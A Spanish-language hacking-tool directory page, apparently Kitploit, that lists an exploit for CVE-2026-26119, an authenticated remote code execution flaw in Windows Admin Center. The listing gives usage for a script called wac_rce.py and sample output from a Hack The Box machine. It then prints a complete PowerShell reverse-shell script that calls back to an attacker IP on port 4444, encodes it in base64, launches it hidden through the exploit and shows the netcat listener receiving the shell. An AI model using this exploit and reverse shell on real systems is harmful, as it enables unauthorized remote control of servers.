Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-26119 — WAC RCE - CVE-2026-26119 Windows Admin Center RCE autenticado mediante WinREST/PowerShell invokeCommand. | Kitploit
Herramientas/GitHubGitHub/r3vpwnx/cve-2026-26119
Análisis de VulnerabilidadesExplotaciónPruebas de Penetración
GitHubr3vpwnx/cve-2026-26119

CVE-2026-26119

WAC RCE - CVE-2026-26119 Windows Admin Center RCE autenticado mediante WinREST/PowerShell invokeCommand.

Ver Repositorio
1117hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-26119

WAC RCE - CVE-2026-26119 Windows Admin Center RCE autenticado mediante WinREST/PowerShell invokeCommand.

Uso:

    python3 wac_rce.py <user> <pass> "<powershell command>"
    WAC_PASS=<pass> python3 wac_rce.py <user>

Variables de entorno:

    WAC_BASE  - override target base URL (default below)
    WAC_PASS  - password, used if not passed positionally

┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ python3 wac_rce.py 'anderson.w' 'Password' 'whoami'      
danglingtree\anderson.w

Cómo obtener la reverse shell:

cat > revshell.ps1 << 'EOF'                                      
$client = New-Object System.Net.Sockets.TCPClient('tun0 IP',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | % {0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()
EOF
cat revshell.ps1 | iconv -t utf-16le | base64 -w 0 > revshell.b64

crear un listener nc:

nc -nlvp 4444
python3 wac_rce.py 'anderson.w' 'Password' "Start-Process powershell -WindowStyle Hidden -ArgumentList '-nop -enc $(cat revshell.b64)'"
┌──(pwn㉿pwn)-[~/HTB/DanglingTree]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [tun0] from (UNKNOWN) [IP] 54318
$Host.UI.RawUI.WindowTitle = "shell"
PS C:\Users\anderson.w\Documents>
Descargar herramienta